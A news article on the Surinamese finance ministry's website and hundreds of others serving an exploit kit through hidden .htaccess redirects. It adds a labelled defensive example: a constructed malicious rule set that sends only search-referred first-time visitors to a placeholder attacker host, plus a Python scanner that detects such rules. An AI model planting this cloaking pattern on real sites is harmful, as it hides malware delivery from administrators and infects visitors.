Surinamese ministry spread malware via website

The website of the Surinamese ministry of finance has inadvertently served malware, as have several hundred other large websites, according to research by security company Fox-IT. The malware was only served in certain cases, by way of a .htaccess file.

Fox-IT discovered the infection of the Surinamese ministry of finance's website during an investigation into the attack, which also hit a great many other sites. "Hundreds of websites," Yonathan Klijnsma of the security company told Tweakers. A website offering iPhone subscriptions, a website that lets users create guest books and an Amsterdam cinema were infected as well.

Meanwhile the website of the Surinamese ministry is virus-free again. "A weekend after we got in touch with them, they were already clean," according to Klijnsma. Not all infected sites are clean again yet, Klijnsma warns. The Surinamese ministry could not be reached for comment.

Klijnsma thinks that the attackers went looking for large sites that they could break into. How exactly they managed to break into the Surinamese ministry's site is not known. "They search for popular search terms on Google and try to break into the websites that come out on top," according to Klijnsma. "Think of outdated versions of WordPress and Joomla."

The attack was sophisticated. The attackers placed a .htaccess file in various folders on the website, researcher Klijnsma writes in a blog post. That .htaccess file made sure that visitors were only redirected to a page with malware in certain cases, for example when they arrived with a referrer from social media or a search engine. Repeat visitors and people who go directly to the site were not redirected. That made the problem hard or impossible for administrators to notice: an administrator who types in the address, or who has visited before, sees a perfectly normal site.
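To make the mechanism concrete, here is an added example that is not part of the article or of Fox-IT's research. It models the kind of conditional redirect described above and shows how an administrator would check for it. The .htaccess rules in SAMPLE_HTACCESS are a constructed approximation of the behaviour the article describes (redirect only on a search-engine or social-media referrer, only on a first visit, never for crawlers), not the attackers' actual file; the host names redirector.invalid and victim.invalid are placeholders. The evaluator implements only the subset of mod_rewrite needed for this pattern: every RewriteCond before a RewriteRule must hold, the rule pattern is matched against REQUEST_URI, and the OR flag is not supported.

```python
"""Model and detect referrer-conditioned .htaccess redirects (added example)."""
import re
from pathlib import Path

# Constructed sample, modelled on the article's description. A visitor coming
# from a search engine or social network, without a marker cookie and not
# identifying as a crawler, is sent to the attacker's landing page; the rule
# also sets the cookie so the same browser is never redirected twice.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|bing|yahoo|facebook|twitter)\\. [NC]
RewriteCond %{HTTP_COOKIE} !seen=1
RewriteCond %{HTTP_USER_AGENT} !(googlebot|bingbot) [NC]
RewriteRule .* http://redirector.invalid/land.php [R=302,L,CO=seen:1:.victim.invalid]
"""

COND_RE = re.compile(r"^\s*RewriteCond\s+%\{(\w+)\}\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)

# Request variables whose presence in a redirect's conditions is the tell-tale
# of selective serving: the redirect depends on who is asking, not on the URL.
GATING_VARS = {"HTTP_REFERER", "HTTP_USER_AGENT", "HTTP_COOKIE", "REMOTE_ADDR"}


def parse_rules(text):
    """Group each RewriteRule with the RewriteCond lines that precede it."""
    rules, conds = [], []
    for line in text.splitlines():
        m = COND_RE.match(line)
        if m:
            var, pattern, flags = m.groups()
            conds.append({"var": var.upper(), "pattern": pattern,
                          "flags": (flags or "").upper()})
            continue
        m = RULE_RE.match(line)
        if m:
            pattern, target, flags = m.groups()
            rules.append({"conds": conds, "pattern": pattern,
                          "target": target, "flags": (flags or "").upper()})
            conds = []  # conditions only apply to the next rule
    return rules


def cond_matches(cond, request):
    """Evaluate one RewriteCond: regex match, '!' negation and the NC flag."""
    value = request.get(cond["var"], "")
    pattern = cond["pattern"]
    negate = pattern.startswith("!")
    if negate:
        pattern = pattern[1:]
    re_flags = re.I if "NC" in cond["flags"].split(",") else 0
    hit = re.search(pattern, value, re_flags) is not None
    return hit != negate


def redirect_target(text, request):
    """Return the URL this request would be redirected to, or None."""
    for rule in parse_rules(text):
        if not re.search(rule["pattern"], request.get("REQUEST_URI", "/")):
            continue
        if all(cond_matches(c, request) for c in rule["conds"]):
            if any(f.startswith("R") for f in rule["flags"].split(",")):
                return rule["target"]
    return None


def suspicious_rules(text, own_hosts=()):
    """Flag redirects to a host outside own_hosts that are gated on referrer,
    user agent, cookie or client address. Returns [(host, [gating vars])]."""
    findings = []
    for rule in parse_rules(text):
        m = re.match(r"https?://([^/]+)", rule["target"])
        if not m or m.group(1).lower() in own_hosts:
            continue
        gated = {c["var"] for c in rule["conds"]} & GATING_VARS
        if gated:
            findings.append((m.group(1), sorted(gated)))
    return findings


def scan_webroot(root, own_hosts=()):
    """Walk a web root, since the file may sit in many folders, and report
    every .htaccess containing a gated external redirect."""
    report = {}
    for path in Path(root).rglob(".htaccess"):
        hits = suspicious_rules(path.read_text(errors="replace"), own_hosts)
        if hits:
            report[str(path)] = hits
    return report


if __name__ == "__main__":
    from_search = {"HTTP_REFERER": "https://www.google.com/search?q=ministerie",
                   "HTTP_USER_AGENT": "Mozilla/5.0", "REQUEST_URI": "/"}
    typed_in = {"HTTP_REFERER": "", "HTTP_USER_AGENT": "Mozilla/5.0",
                "REQUEST_URI": "/"}
    print("search visitor ->", redirect_target(SAMPLE_HTACCESS, from_search))
    print("administrator  ->", redirect_target(SAMPLE_HTACCESS, typed_in))
    print(suspicious_rules(SAMPLE_HTACCESS, own_hosts={"www.victim.invalid"}))
```

The practical lesson is in the last two calls: fetching the site with curl from the server itself, without a referrer, proves nothing, because that request is exactly the one the rules let through. Reproduce the redirect with a search-engine referrer and a fresh cookie jar, and check every directory for .htaccess files rather than only the document root.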

Visitors who were redirected to the malware page were served an exploit kit: the so-called Zuponcic exploit kit, which tried to install malware through holes in Java in combination with Internet Explorer. Anyone not using IE with Java was presented with a .zip file instead, in the hope that the user would not know better and would open it and click the executable inside.

Striking about the Java applet that was served is that it was signed with valid certificates, issued by trusted certificate authorities such as VeriSign and GlobalSign. That indicates the certificates were stolen from the servers of companies that had bought them from those authorities. A valid signature matters to the attackers because a properly signed applet passes Java's signature check and presents the user with a far less alarming prompt than unsigned code would.

Whoever gets infected becomes part of a botnet. Botnets consist of infected computers that receive instructions from command-and-control servers, such as contributing to new attacks, sending spam or carrying out DDoS attacks.